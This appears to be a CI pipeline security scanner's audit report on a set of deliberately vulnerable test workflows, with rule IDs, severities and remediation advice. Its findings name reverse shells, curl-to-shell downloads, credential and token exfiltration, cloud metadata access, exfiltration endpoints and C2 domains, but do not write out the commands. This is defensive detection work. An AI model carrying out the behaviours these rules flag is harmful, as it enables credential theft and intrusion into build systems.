| Field | Value |
|---|---|
| Repository | unknown |
| Commit SHA | N/A |
| Branch / Ref | N/A |
| Scan Mode | audit |
| Tool Version | 4.0.0 |
| Trigger | workflow_dispatch |
| Runner OS | ubuntu-latest |

| Scanner Module | Findings |
|---|---|
| behavioral_analysis | 101 |
| compromised_actions | 69 |
| network_exfiltration | 64 |
| workflow_analysis | 35 |
| permission_audit | 29 |
| cross_platform_ci | 23 |
| reusable_workflow | 17 |
| secret_exposure | 13 |
| artifact_integrity | 12 |
| pwn_request | 11 |
| container_security | 11 |
| oidc_audit | 7 |
| cache_poisoning | 2 |
| provenance_verification | 2 |
Sorted by severity. Exempted findings shown separately below.
| Severity | Rule ID | Finding | Location | Remediation |
|---|---|---|---|---|
| 🚨 CRITICAL | SCA-COMP-SHA | COMPROMISED SHA detected: aquasecurity/trivy-action@f77738448eec70113cf711656914b61905b3bd47 (compromised_actions) | vulnerable-workflows/19-teampcp-indicators.yml | Immediately remove or update this action. Rotate all secrets that may have been exposed. Reference: aquasecurity/trivy-action Compromise (75 tags) (CVE-2026-33634) |
| 🚨 CRITICAL | SCA-COMP-SHA | COMPROMISED SHA detected: aquasecurity/setup-trivy@8afa9b9f9183b4e00c46e2b82d34047e3c177bd0 (compromised_actions) | vulnerable-workflows/19-teampcp-indicators.yml | Immediately remove or update this action. Rotate all secrets that may have been exposed. Reference: aquasecurity/setup-trivy Compromise (7 SHAs) (CVE-2026-33634) |
| 🚨 CRITICAL | SCA-098 | Potentially compromised tag for aquasecurity/trivy-action: @master (compromised_actions) | vulnerable-workflows/23-self-hosted-runner.yml | Pin to a known-safe version: 0.35.0 |
| 🚨 CRITICAL | SCA-005 | Pwn Request: pull_request_target checks out PR head in job 'deploy-preview' (pwn_request) | vulnerable-workflows/27-oidc-token-abuse.yml | Never checkout PR head code with pull_request_target. Use pull_request trigger instead, or if you must use pull_request_target, only checkout the base branch. |
| 🚨 CRITICAL | SCA-005 | Pwn Request: pull_request_target checks out PR head in job 'auto-review' (pwn_request) | vulnerable-workflows/02-pwn-request.yml | Never checkout PR head code with pull_request_target. Use pull_request trigger instead, or if you must use pull_request_target, only checkout the base branch. |
| 🚨 CRITICAL | SCA-055 | Dangerous command: Piping curl to bash (workflow_analysis) | vulnerable-workflows/37-build-system-compromise.yml | Download files, verify checksums, then execute. Never pipe remote content directly to a shell interpreter. |
| 🚨 CRITICAL | SCA-055 | Dangerous command: Process substitution from curl (workflow_analysis) | vulnerable-workflows/37-build-system-compromise.yml | Download files, verify checksums, then execute. Never pipe remote content directly to a shell interpreter. |
| 🚨 CRITICAL | SCA-055 | Dangerous command: Piping curl to bash (workflow_analysis) | vulnerable-workflows/37-build-system-compromise.yml | Download files, verify checksums, then execute. Never pipe remote content directly to a shell interpreter. |
| 🚨 CRITICAL | SCA-055 | curl\|bash anti-pattern detected (workflow_analysis) | vulnerable-workflows/37-build-system-compromise.yml | 1. Download the script to a file 2. Verify its SHA-256 hash against a known value 3. Then execute it |
| 🚨 CRITICAL | SCA-055 | curl\|bash anti-pattern detected (workflow_analysis) | vulnerable-workflows/37-build-system-compromise.yml | 1. Download the script to a file 2. Verify its SHA-256 hash against a known value 3. Then execute it |
| 🚨 CRITICAL | SCA-055 | Dangerous command: Piping curl to bash (workflow_analysis) | vulnerable-workflows/15-behavioral-obfuscation.yml | Download files, verify checksums, then execute. Never pipe remote content directly to a shell interpreter. |
| 🚨 CRITICAL | SCA-055 | Dangerous command: Piping wget to shell (workflow_analysis) | vulnerable-workflows/15-behavioral-obfuscation.yml | Download files, verify checksums, then execute. Never pipe remote content directly to a shell interpreter. |
| 🚨 CRITICAL | SCA-055 | curl\|bash anti-pattern detected (workflow_analysis) | vulnerable-workflows/15-behavioral-obfuscation.yml | 1. Download the script to a file 2. Verify its SHA-256 hash against a known value 3. Then execute it |
| 🚨 CRITICAL | SCA-022 | Credential exfiltration: Process environment read (secret_exposure) | vulnerable-workflows/14-runtime-cryptominer.yml | Never pass secrets to external services or output them to logs. Use OIDC for cloud authentication. Review this code carefully. |
| 🚨 CRITICAL | SCA-022 | Credential exfiltration: Environment base64 encoded (secret_exposure) | vulnerable-workflows/17-egress-exfiltration.yml | Never pass secrets to external services or output them to logs. Use OIDC for cloud authentication. Review this code carefully. |
| 🚨 CRITICAL | SCA-022 | Credential exfiltration: Environment base64 encoded (secret_exposure) | vulnerable-workflows/04-network-exfiltration.yml | Never pass secrets to external services or output them to logs. Use OIDC for cloud authentication. Review this code carefully. |
| 🚨 CRITICAL | SCA-022 | Credential exfiltration: GitHub Actions runner process (tj-actions pattern) (secret_exposure) | vulnerable-workflows/19-teampcp-indicators.yml | Never pass secrets to external services or output them to logs. Use OIDC for cloud authentication. Review this code carefully. |
| 🚨 CRITICAL | SCA-022 | Credential exfiltration: GitHub Actions runner process (tj-actions pattern) (secret_exposure) | vulnerable-workflows/19-teampcp-indicators.yml | Never pass secrets to external services or output them to logs. Use OIDC for cloud authentication. Review this code carefully. |
| 🚨 CRITICAL | SCA-022 | Credential exfiltration: Secret detection bypass (tj-actions pattern) (secret_exposure) | vulnerable-workflows/19-teampcp-indicators.yml | Never pass secrets to external services or output them to logs. Use OIDC for cloud authentication. Review this code carefully. |
| 🚨 CRITICAL | SCA-044 | Hardcoded Google API Key detected (secret_exposure) | vulnerable-workflows/21-ai-credential-exposure.yml | Move this Google API Key to GitHub Secrets and reference it as ${{ secrets.SECRET_NAME }}. Rotate the exposed credential immediately. |
| 🚨 CRITICAL | SCA-044 | Hardcoded Private Key detected (secret_exposure) | vulnerable-workflows/03-secret-exposure.yml | Move this Private Key to GitHub Secrets and reference it as ${{ secrets.SECRET_NAME }}. Rotate the exposed credential immediately. |
| 🚨 CRITICAL | SCA-022 | Credential exfiltration: Environment base64 encoded (secret_exposure) | vulnerable-workflows/15-behavioral-obfuscation.yml | Never pass secrets to external services or output them to logs. Use OIDC for cloud authentication. Review this code carefully. |
| 🚨 CRITICAL | SCA-022 | Credential exfiltration: Secret detection bypass (tj-actions pattern) (secret_exposure) | vulnerable-workflows/16-gitlab-ci.yml | Never pass secrets to external services or output them to logs. Use OIDC for cloud authentication. Review this code carefully. |
| 🚨 CRITICAL | SCA-110 | Cloud metadata endpoint access: AWS/GCP/Azure Instance Metadata Service (IMDS) (network_exfiltration) | vulnerable-workflows/20-cloud-metadata-imds.yml | Block IMDS access (169.254.169.254). Use IMDSv2 with token requirement on AWS. Implement network policies to restrict metadata access in CI. |
| 🚨 CRITICAL | SCA-110 | Cloud metadata endpoint access: AWS/GCP/Azure Instance Metadata Service (IMDS) (network_exfiltration) | vulnerable-workflows/20-cloud-metadata-imds.yml | Block IMDS access (169.254.169.254). Use IMDSv2 with token requirement on AWS. Implement network policies to restrict metadata access in CI. |
| 🚨 CRITICAL | SCA-110 | Cloud metadata endpoint access: GCP Metadata endpoint (network_exfiltration) | vulnerable-workflows/20-cloud-metadata-imds.yml | Block IMDS access (169.254.169.254). Use IMDSv2 with token requirement on AWS. Implement network policies to restrict metadata access in CI. |
| 🚨 CRITICAL | SCA-110 | Cloud metadata endpoint access: Azure IMDS endpoint (network_exfiltration) | vulnerable-workflows/20-cloud-metadata-imds.yml | Block IMDS access (169.254.169.254). Use IMDSv2 with token requirement on AWS. Implement network policies to restrict metadata access in CI. |
| 🚨 CRITICAL | SCA-037 | Reverse shell detected: Bash /dev/tcp reverse shell (network_exfiltration) | vulnerable-workflows/17-egress-exfiltration.yml | Remove the reverse shell code. Investigate how it was introduced. Rotate all secrets and review recent workflow runs. |
| 🚨 CRITICAL | SCA-037 | Reverse shell detected: Bash interactive reverse shell (network_exfiltration) | vulnerable-workflows/17-egress-exfiltration.yml | Remove the reverse shell code. Investigate how it was introduced. Rotate all secrets and review recent workflow runs. |
| 🚨 CRITICAL | SCA-037 | Reverse shell detected: Bash /dev/tcp reverse shell (network_exfiltration) | vulnerable-workflows/04-network-exfiltration.yml | Remove the reverse shell code. Investigate how it was introduced. Rotate all secrets and review recent workflow runs. |
| 🚨 CRITICAL | SCA-037 | Reverse shell detected: Bash interactive reverse shell (network_exfiltration) | vulnerable-workflows/04-network-exfiltration.yml | Remove the reverse shell code. Investigate how it was introduced. Rotate all secrets and review recent workflow runs. |
| 🚨 CRITICAL | SCA-037 | Reverse shell detected: Netcat reverse shell (network_exfiltration) | vulnerable-workflows/04-network-exfiltration.yml | Remove the reverse shell code. Investigate how it was introduced. Rotate all secrets and review recent workflow runs. |
| 🚨 CRITICAL | SCA-037 | Reverse shell detected: Python socket reverse shell (network_exfiltration) | vulnerable-workflows/04-network-exfiltration.yml | Remove the reverse shell code. Investigate how it was introduced. Rotate all secrets and review recent workflow runs. |
| 🚨 CRITICAL | SCA-094 | TeamPCP C2 communication: TeamPCP C2 domain (typosquat of aquasecurity) (network_exfiltration) | vulnerable-workflows/19-teampcp-indicators.yml | Block all access. Assume full credential compromise. Rotate ALL secrets immediately. |
| 🚨 CRITICAL | SCA-094 | TeamPCP C2 communication: TeamPCP C2 base domain (network_exfiltration) | vulnerable-workflows/19-teampcp-indicators.yml | Block all access. Assume full credential compromise. Rotate ALL secrets immediately. |
| 🚨 CRITICAL | SCA-094 | TeamPCP C2 communication: TeamPCP ICP fallback C2 (network_exfiltration) | vulnerable-workflows/19-teampcp-indicators.yml | Block all access. Assume full credential compromise. Rotate ALL secrets immediately. |
| 🚨 CRITICAL | SCA-039 | Data exfiltration endpoint: webhook.site (network_exfiltration) | vulnerable-workflows/15-behavioral-obfuscation.yml | Remove access to webhook.site. Investigate when this was added. Rotate all secrets that may have been exposed. |
| 🚨 CRITICAL | SCA-039 | Data exfiltration endpoint: requestbin.net (network_exfiltration) | vulnerable-workflows/15-behavioral-obfuscation.yml | Remove access to requestbin.net. Investigate when this was added. Rotate all secrets that may have been exposed. |
| 🚨 CRITICAL | SCA-109 | Egress anomaly: wget pipe-to-shell (network_exfiltration) | vulnerable-workflows/15-behavioral-obfuscation.yml | Use StepSecurity Harden-Runner for network egress monitoring. Block outbound traffic to non-allowed endpoints. If this is a legitimate domain, add it to .scg-config.yml egress_allowlist. |
| 🚨 CRITICAL | SCA-039 | Data exfiltration endpoint: webhook.site (network_exfiltration) | vulnerable-workflows/34-network-egress-anomaly.yml | Remove access to webhook.site. Investigate when this was added. Rotate all secrets that may have been exposed. |
| 🚨 CRITICAL | SCA-039 | Data exfiltration endpoint: requestbin.com (network_exfiltration) | vulnerable-workflows/34-network-egress-anomaly.yml | Remove access to requestbin.com. Investigate when this was added. Rotate all secrets that may have been exposed. |
| 🚨 CRITICAL | SCA-039 | Data exfiltration endpoint: pipedream.net (network_exfiltration) | vulnerable-workflows/34-network-egress-anomaly.yml | Remove access to pipedream.net. Investigate when this was added. Rotate all secrets that may have been exposed. |
| 🚨 CRITICAL | SCA-063 | Possible OIDC token forwarding to external endpoint (oidc_audit) | vulnerable-workflows/10-oidc-abuse.yml | Never forward OIDC tokens manually. Use official cloud provider actions for authentication. |
| 🚨 CRITICAL | SCA-063 | Possible OIDC token forwarding to external endpoint (oidc_audit) | vulnerable-workflows/27-oidc-token-abuse.yml | Never forward OIDC tokens manually. Use official cloud provider actions for authentication. |
| 🚨 CRITICAL | SCA-064 | Wildcard OIDC audience configured (oidc_audit) | vulnerable-workflows/27-oidc-token-abuse.yml | Set a specific audience value matching only your intended cloud provider. |
| 🚨 CRITICAL | SCA-065 | OIDC token available in pull_request_target context (oidc_audit) | vulnerable-workflows/27-oidc-token-abuse.yml | Do NOT grant id-token: write in pull_request_target workflows. Use a separate trusted workflow for cloud auth. |
| 🚨 CRITICAL | SCA-073 | Privileged container in job 'build-container' (container_security) | vulnerable-workflows/26-container-attacks.yml | Remove --privileged. Use specific capabilities with --cap-add if needed. |
| 🚨 CRITICAL | SCA-076 | Docker socket mount detected (container escape risk) (container_security) | vulnerable-workflows/09-container-escape.yml | Avoid mounting the Docker socket. Use Docker-in-Docker (dind) with proper isolation or rootless Docker. |
| 🚨 CRITICAL | SCA-082 | Pipe-to-shell in Dockerfile RUN (container_security) | vulnerable-workflows/26-Dockerfile | Download scripts first, verify their checksum, then execute. |
| 🚨 CRITICAL | SCA-082 | Pipe-to-shell in Dockerfile RUN (container_security) | vulnerable-workflows/26-Dockerfile | Download scripts first, verify their checksum, then execute. |
| 🚨 CRITICAL | SCA-BHV-CRED | Environment piped through processing (behavioral_analysis) | vulnerable-workflows/17-egress-exfiltration.yml | Do not dump or enumerate environment variables. Use OIDC authentication instead of long-lived secrets. Restrict secret access to the minimum set of steps that need them. |
| 🚨 CRITICAL | SCA-BHV-DYN | Remote script fetched and executed (curl\|sh) (behavioral_analysis) | vulnerable-workflows/37-build-system-compromise.yml | Never pipe downloaded content to a shell. Pin all downloads to checksums (sha256). Use official package managers instead of ad-hoc downloads. |
| 🚨 CRITICAL | SCA-BHV-DYN | Remote script fetched and executed (curl\|sh) (behavioral_analysis) | vulnerable-workflows/37-build-system-compromise.yml | Never pipe downloaded content to a shell. Pin all downloads to checksums (sha256). Use official package managers instead of ad-hoc downloads. |
| 🚨 CRITICAL | SCA-BHV-CRED | Environment piped through processing (behavioral_analysis) | vulnerable-workflows/04-network-exfiltration.yml | Do not dump or enumerate environment variables. Use OIDC authentication instead of long-lived secrets. Restrict secret access to the minimum set of steps that need them. |
| 🚨 CRITICAL | SCA-BHV-OBF | Base64-decoded payload piped to shell (behavioral_analysis) | vulnerable-workflows/15-behavioral-obfuscation.yml | Remove obfuscated code. All CI logic should be human-readable. If you must decode data, verify integrity with checksums first. |
| 🚨 CRITICAL | SCA-BHV-OBF | Long base64 literal decoded at runtime (behavioral_analysis) | vulnerable-workflows/15-behavioral-obfuscation.yml | Remove obfuscated code. All CI logic should be human-readable. If you must decode data, verify integrity with checksums first. |
| 🚨 CRITICAL | SCA-BHV-DYN | Remote script fetched and executed (curl\|sh) (behavioral_analysis) | vulnerable-workflows/15-behavioral-obfuscation.yml | Never pipe downloaded content to a shell. Pin all downloads to checksums (sha256). Use official package managers instead of ad-hoc downloads. |
| 🚨 CRITICAL | SCA-BHV-DYN | Remote script fetched and executed (wget\|sh) (behavioral_analysis) | vulnerable-workflows/15-behavioral-obfuscation.yml | Never pipe downloaded content to a shell. Pin all downloads to checksums (sha256). Use official package managers instead of ad-hoc downloads. |
| 🚨 CRITICAL | SCA-BHV-CRED | Environment piped through processing (behavioral_analysis) | vulnerable-workflows/15-behavioral-obfuscation.yml | Do not dump or enumerate environment variables. Use OIDC authentication instead of long-lived secrets. Restrict secret access to the minimum set of steps that need them. |
| 🚨 CRITICAL | SCA-BHV-CRED | Environment piped through processing (behavioral_analysis) | vulnerable-workflows/15-behavioral-obfuscation.yml | Do not dump or enumerate environment variables. Use OIDC authentication instead of long-lived secrets. Restrict secret access to the minimum set of steps that need them. |
| 🚨 CRITICAL | SCA-BHV-TRUST | Docker root filesystem mount (behavioral_analysis) | vulnerable-workflows/16-gitlab-ci.yml | Apply least-privilege to containers. Never use --privileged or mount the host root filesystem. Use GitHub-hosted runners for untrusted workloads. |
| 🚨 CRITICAL | SCA-BHV-TRUST | Container / namespace escape utility (behavioral_analysis) | vulnerable-workflows/16-gitlab-ci.yml | Apply least-privilege to containers. Never use --privileged or mount the host root filesystem. Use GitHub-hosted runners for untrusted workloads. |
| 🚨 CRITICAL | SCA-BHV-CRED | Environment piped through processing (behavioral_analysis) | vulnerable-workflows/16-gitlab-ci.yml | Do not dump or enumerate environment variables. Use OIDC authentication instead of long-lived secrets. Restrict secret access to the minimum set of steps that need them. |
| 🚨 CRITICAL | SCA-105 | [JENKINS] Echo of secret variable (cross_platform_ci) | vulnerable-workflows/16-Jenkinsfile | Review and remediate this jenkins configuration issue. |
| 🚨 CRITICAL | SCA-105 | [JENKINS] Secret passed to curl (cross_platform_ci) | vulnerable-workflows/16-Jenkinsfile | Review and remediate this jenkins configuration issue. |
| 🚨 CRITICAL | SCA-105 | [JENKINS] Echo of secret variable (cross_platform_ci) | vulnerable-workflows/16-Jenkinsfile | Review and remediate this jenkins configuration issue. |
| 🚨 CRITICAL | SCA-106 | [GITLAB] Echo of CI_JOB_TOKEN (cross_platform_ci) | vulnerable-workflows/16-gitlab-ci.yml | Review and remediate this gitlab configuration issue. |
| 🚨 CRITICAL | SCA-106 | [GITLAB] Echo of CI_REGISTRY_PASSWORD (cross_platform_ci) | vulnerable-workflows/16-gitlab-ci.yml | Review and remediate this gitlab configuration issue. |
| 🚨 CRITICAL | SCA-106 | [GITLAB] Echo of CI_JOB_TOKEN (cross_platform_ci) | vulnerable-workflows/16-gitlab-ci.yml | Review and remediate this gitlab configuration issue. |
| 🚨 CRITICAL | SCA-106 | [GITLAB] PRIVATE_TOKEN passed to curl (cross_platform_ci) | vulnerable-workflows/16-gitlab-ci.yml | Review and remediate this gitlab configuration issue. |
| 🚨 CRITICAL | SCA-107 | [CIRCLECI] Echo of CIRCLE_TOKEN (cross_platform_ci) | vulnerable-workflows/31-circleci-config.yml | Review and remediate this circleci configuration issue. |
| 🚨 CRITICAL | SCA-107 | [CIRCLECI] Echo of CIRCLE_TOKEN (cross_platform_ci) | vulnerable-workflows/31-circleci-config.yml | Review and remediate this circleci configuration issue. |
| 🚨 CRITICAL | SCA-108 | [AZURE] Echo of System.AccessToken (cross_platform_ci) | vulnerable-workflows/30-azure-pipelines.yml | Review and remediate this azure configuration issue. |
| 🚨 CRITICAL | SCA-108 | [AZURE] Echo of secret variable (cross_platform_ci) | vulnerable-workflows/30-azure-pipelines.yml | Review and remediate this azure configuration issue. |
| 🚨 CRITICAL | SCA-108 | [AZURE] Echo of secret variable (cross_platform_ci) | vulnerable-workflows/30-azure-pipelines.yml | Review and remediate this azure configuration issue. |
| 🚨 CRITICAL | SCA-108 | [AZURE] System.AccessToken in curl (cross_platform_ci) | vulnerable-workflows/30-azure-pipelines.yml | Review and remediate this azure configuration issue. |
| 🚨 CRITICAL | SCA-108 | [AZURE] Echo of System.AccessToken (cross_platform_ci) | vulnerable-workflows/30-azure-pipelines.yml | Review and remediate this azure configuration issue. |
| Severity | Rule ID | Finding | Location | Remediation |
|---|---|---|---|---|
| โ ๏ธ HIGH | SCA-COMP-TAG |
Previously-compromised action used with mutable tag: Checkmarx/kics-github-action@v2
compromised_actions |
vulnerable-workflows/19-teampcp-indicators.yml | Pin to a verified commit SHA or remove this action entirely. Attack reference: Checkmarx KICS GitHub Action Compromise (TeamPCP) (N/A) |
| โ ๏ธ HIGH | SCA-COMP-TAG |
Previously-compromised action used with mutable tag: Checkmarx/kics-github-action@v2
compromised_actions |
vulnerable-workflows/19-teampcp-indicators.yml | Pin to a verified commit SHA or remove this action entirely. Attack reference: Checkmarx KICS GitHub Action Compromise (TeamPCP) (N/A) |
| โ ๏ธ HIGH | SCA-COMP-TAG |
Previously-compromised action used with mutable tag: aquasecurity/trivy-action@master
compromised_actions |
vulnerable-workflows/23-self-hosted-runner.yml | Pin to a verified commit SHA or remove this action entirely. Attack reference: aquasecurity/trivy-action Compromise (75 tags) (CVE-2026-33634) |
| โ ๏ธ HIGH | SCA-COMP-TAG |
Previously-compromised action used with mutable tag: reviewdog/action-eslint@fff29c5
compromised_actions |
vulnerable-workflows/01-compromised-action.yml | Pin to a verified commit SHA or remove this action entirely. Attack reference: reviewdog Supply Chain Attack (CVE-2025-30154) |
| โ ๏ธ HIGH | SCA-026 |
Script injection via untrusted input: Issue title
pwn_request |
vulnerable-workflows/24-output-injection.yml | Pass Issue title as an environment variable instead: env: INPUT_VALUE: ${{ github.event... }} run: echo "$INPUT_VALUE" |
| โ ๏ธ HIGH | SCA-026 |
Script injection via untrusted input: PR body
pwn_request |
vulnerable-workflows/24-output-injection.yml | Pass PR body as an environment variable instead: env: INPUT_VALUE: ${{ github.event... }} run: echo "$INPUT_VALUE" |
| โ ๏ธ HIGH | SCA-026 |
Script injection via untrusted input: Head ref branch name
pwn_request |
vulnerable-workflows/24-output-injection.yml | Pass Head ref branch name as an environment variable instead: env: INPUT_VALUE: ${{ github.event... }} run: echo "$INPUT_VALUE" |
| โ ๏ธ HIGH | SCA-026 |
Script injection via untrusted input: PR title
pwn_request |
vulnerable-workflows/24-output-injection.yml | Pass PR title as an environment variable instead: env: INPUT_VALUE: ${{ github.event... }} run: echo "$INPUT_VALUE" |
| โ ๏ธ HIGH | SCA-026 |
Script injection via untrusted input: Head ref branch name
pwn_request |
vulnerable-workflows/24-output-injection.yml | Pass Head ref branch name as an environment variable instead: env: INPUT_VALUE: ${{ github.event... }} run: echo "$INPUT_VALUE" |
| โ ๏ธ HIGH | SCA-026 |
Script injection via untrusted input: PR body
pwn_request |
vulnerable-workflows/24-output-injection.yml | Pass PR body as an environment variable instead: env: INPUT_VALUE: ${{ github.event... }} run: echo "$INPUT_VALUE" |
| โ ๏ธ HIGH | SCA-026 |
Script injection via untrusted input: PR title
pwn_request |
vulnerable-workflows/02-pwn-request.yml | Pass PR title as an environment variable instead: env: INPUT_VALUE: ${{ github.event... }} run: echo "$INPUT_VALUE" |
| โ ๏ธ HIGH | SCA-026 |
Script injection via untrusted input: PR title
pwn_request |
vulnerable-workflows/02-pwn-request.yml | Pass PR title as an environment variable instead: env: INPUT_VALUE: ${{ github.event... }} run: echo "$INPUT_VALUE" |
| โ ๏ธ HIGH | SCA-026 |
Script injection via untrusted input: PR body
pwn_request |
vulnerable-workflows/02-pwn-request.yml | Pass PR body as an environment variable instead: env: INPUT_VALUE: ${{ github.event... }} run: echo "$INPUT_VALUE" |
| โ ๏ธ HIGH | SCA-035 |
Self-hosted runner in job 'build-on-self-hosted'
workflow_analysis |
vulnerable-workflows/23-self-hosted-runner.yml | Use ephemeral runners (GitHub-hosted or auto-scaling). Never use self-hosted runners for public repositories. If self-hosted runners are required, use container isolation. |
| โ ๏ธ HIGH | SCA-035 |
Self-hosted runner in job 'test-on-self-hosted'
workflow_analysis |
vulnerable-workflows/23-self-hosted-runner.yml | Use ephemeral runners (GitHub-hosted or auto-scaling). Never use self-hosted runners for public repositories. If self-hosted runners are required, use container isolation. |
| โ ๏ธ HIGH | SCA-027 |
Unsanitized data written to GITHUB_ENV
workflow_analysis |
vulnerable-workflows/24-output-injection.yml | Use heredoc delimiters for multi-line values. Sanitize input before writing to GITHUB_ENV. |
| โ ๏ธ HIGH | SCA-027 |
Unsanitized data written to GITHUB_ENV
workflow_analysis |
vulnerable-workflows/24-output-injection.yml | Use heredoc delimiters for multi-line values. Sanitize input before writing to GITHUB_ENV. |
| โ ๏ธ HIGH | SCA-027 |
Unsanitized data written to GITHUB_ENV
workflow_analysis |
vulnerable-workflows/02-pwn-request.yml | Use heredoc delimiters for multi-line values. Sanitize input before writing to GITHUB_ENV. |
| โ ๏ธ HIGH | SCA-084 |
Reusable workflow called with mutable ref: org-name/shared-workflows/.github/workflows/deploy.yml@main
reusable_workflow |
vulnerable-workflows/25-reusable-workflow-attacks.yml | Pin to a full commit SHA: org-name/shared-workflows/.github/workflows/deploy.yml@<sha> |
| โ ๏ธ HIGH | SCA-086 |
All secrets inherited by reusable workflow in 'deploy-staging'
reusable_workflow |
vulnerable-workflows/25-reusable-workflow-attacks.yml | Pass only the specific secrets needed: secrets: { MY_SECRET: ${{ secrets.MY_SECRET }} } |
| โ ๏ธ HIGH | SCA-084 |
Reusable workflow called with mutable ref: external-security-org/scanners/.github/workflows/sast.yml@v2
reusable_workflow |
vulnerable-workflows/25-reusable-workflow-attacks.yml | Pin to a full commit SHA: external-security-org/scanners/.github/workflows/sast.yml@<sha> |
| โ ๏ธ HIGH | SCA-086 |
All secrets inherited by reusable workflow in 'security-scan'
reusable_workflow |
vulnerable-workflows/25-reusable-workflow-attacks.yml | Pass only the specific secrets needed: secrets: { MY_SECRET: ${{ secrets.MY_SECRET }} } |
| โ ๏ธ HIGH | SCA-084 |
Reusable workflow called with mutable ref: org-name/shared-workflows/.github/workflows/build.yml@main
reusable_workflow |
vulnerable-workflows/25-reusable-workflow-attacks.yml | Pin to a full commit SHA: org-name/shared-workflows/.github/workflows/build.yml@<sha> |
| โ ๏ธ HIGH | SCA-084 |
Reusable workflow called with mutable ref: org-name/shared-workflows/.github/workflows/release.yml@main
reusable_workflow |
vulnerable-workflows/25-reusable-workflow-attacks.yml | Pin to a full commit SHA: org-name/shared-workflows/.github/workflows/release.yml@<sha> |
| โ ๏ธ HIGH | SCA-086 |
All secrets inherited by reusable workflow in 'elevated-workflow'
reusable_workflow |
vulnerable-workflows/25-reusable-workflow-attacks.yml | Pass only the specific secrets needed: secrets: { MY_SECRET: ${{ secrets.MY_SECRET }} } |
| โ ๏ธ HIGH | SCA-084 |
Reusable workflow called with mutable ref: random-external-org/shared-workflows/.github/workflows/scan.yml@main
reusable_workflow |
vulnerable-workflows/12-reusable-workflow-trust.yml | Pin to a full commit SHA: random-external-org/shared-workflows/.github/workflows/scan.yml@<sha> |
| โ ๏ธ HIGH | SCA-086 |
All secrets inherited by reusable workflow in 'security-scan'
reusable_workflow |
vulnerable-workflows/12-reusable-workflow-trust.yml | Pass only the specific secrets needed: secrets: { MY_SECRET: ${{ secrets.MY_SECRET }} } |
| โ ๏ธ HIGH | SCA-084 |
Reusable workflow called with mutable ref: another-org/deploy-workflows/.github/workflows/deploy.yml@develop
reusable_workflow |
vulnerable-workflows/12-reusable-workflow-trust.yml | Pin to a full commit SHA: another-org/deploy-workflows/.github/workflows/deploy.yml@<sha> |
| โ ๏ธ HIGH | SCA-034 |
Workflow uses 'permissions: write-all'
permission_audit |
vulnerable-workflows/35-dispatch-codeowners.yml | Replace 'write-all' with specific scopes needed by the workflow. |
| โ ๏ธ HIGH | SCA-034 |
Workflow uses 'permissions: write-all'
permission_audit |
vulnerable-workflows/19-teampcp-indicators.yml | Replace 'write-all' with specific scopes needed by the workflow. |
| โ ๏ธ HIGH | SCA-034 |
Workflow uses 'permissions: write-all'
permission_audit |
vulnerable-workflows/25-reusable-workflow-attacks.yml | Replace 'write-all' with specific scopes needed by the workflow. |
| โ ๏ธ HIGH | SCA-034 |
Workflow uses 'permissions: write-all'
permission_audit |
vulnerable-workflows/23-self-hosted-runner.yml | Replace 'write-all' with specific scopes needed by the workflow. |
| โ ๏ธ HIGH | SCA-034 |
Workflow uses 'permissions: write-all'
permission_audit |
vulnerable-workflows/24-output-injection.yml | Replace 'write-all' with specific scopes needed by the workflow. |
| โ ๏ธ HIGH | SCA-034 |
Workflow uses 'permissions: write-all'
permission_audit |
vulnerable-workflows/28-artifact-attacks.yml | Replace 'write-all' with specific scopes needed by the workflow. |
| โ ๏ธ HIGH | SCA-034 |
Workflow uses 'permissions: write-all'
permission_audit |
vulnerable-workflows/06-permission-escalation.yml | Replace 'write-all' with specific scopes needed by the workflow. |
| โ ๏ธ HIGH | SCA-022 |
Credential exfiltration: OIDC token request access
secret_exposure |
vulnerable-workflows/10-oidc-abuse.yml | Never pass secrets to external services or output them to logs. Use OIDC for cloud authentication. Review this code carefully. |
| โ ๏ธ HIGH | SCA-022 |
Credential exfiltration: OIDC token request access
secret_exposure |
vulnerable-workflows/27-oidc-token-abuse.yml | Never pass secrets to external services or output them to logs. Use OIDC for cloud authentication. Review this code carefully. |
| โ ๏ธ HIGH | SCA-022 |
Credential exfiltration: OIDC token request access
secret_exposure |
vulnerable-workflows/27-oidc-token-abuse.yml | Never pass secrets to external services or output them to logs. Use OIDC for cloud authentication. Review this code carefully. |
| ⚠️ HIGH | SCA-109 | Egress anomaly: curl to raw IP address [network_exfiltration] | vulnerable-workflows/20-cloud-metadata-imds.yml | Use StepSecurity Harden-Runner for network egress monitoring. Block outbound traffic to non-allowed endpoints. If this address is a legitimate endpoint, add it to the `egress_allowlist` in `.scg-config.yml`. |
| ⚠️ HIGH | SCA-109 | Egress anomaly: curl to raw IP address [network_exfiltration] | vulnerable-workflows/20-cloud-metadata-imds.yml | Use StepSecurity Harden-Runner for network egress monitoring. Block outbound traffic to non-allowed endpoints. If this address is a legitimate endpoint, add it to the `egress_allowlist` in `.scg-config.yml`. |
| ⚠️ HIGH | SCA-038 | DNS exfiltration: nslookup with variable (potential exfil) [network_exfiltration] | vulnerable-workflows/17-egress-exfiltration.yml | Review DNS-related commands. Restrict DNS resolution in CI if possible. |
| ⚠️ HIGH | SCA-039 | Suspicious domain access: codecov.io [network_exfiltration] | vulnerable-workflows/37-build-system-compromise.yml | Remove access to codecov.io. Review whether this was intentionally added or injected. |
| ⚠️ HIGH | SCA-039 | Suspicious domain access: codecov.io [network_exfiltration] | vulnerable-workflows/37-build-system-compromise.yml | Remove access to codecov.io. Review whether this was intentionally added or injected. |
| ⚠️ HIGH | SCA-039 | Suspicious domain access: codecov.io [network_exfiltration] | vulnerable-workflows/37-build-system-compromise.yml | Remove access to codecov.io. Review whether this was intentionally added or injected. |
| ⚠️ HIGH | SCA-039 | Suspicious domain access: polyfill.io [network_exfiltration] | vulnerable-workflows/37-build-system-compromise.yml | Remove access to polyfill.io. Review whether this was intentionally added or injected. |
| ⚠️ HIGH | SCA-039 | Suspicious domain access: polyfill.io [network_exfiltration] | vulnerable-workflows/37-build-system-compromise.yml | Remove access to polyfill.io. Review whether this was intentionally added or injected. |
| ⚠️ HIGH | SCA-039 | Suspicious domain access: polyfill.io [network_exfiltration] | vulnerable-workflows/37-build-system-compromise.yml | Remove access to polyfill.io. Review whether this was intentionally added or injected. |
| ⚠️ HIGH | SCA-039 | Suspicious domain access: cdn.polyfill.io [network_exfiltration] | vulnerable-workflows/37-build-system-compromise.yml | Remove access to cdn.polyfill.io. Review whether this was intentionally added or injected. |
| ⚠️ HIGH | SCA-038 | DNS exfiltration: nslookup with variable (potential exfil) [network_exfiltration] | vulnerable-workflows/04-network-exfiltration.yml | Review DNS-related commands. Restrict DNS resolution in CI if possible. |
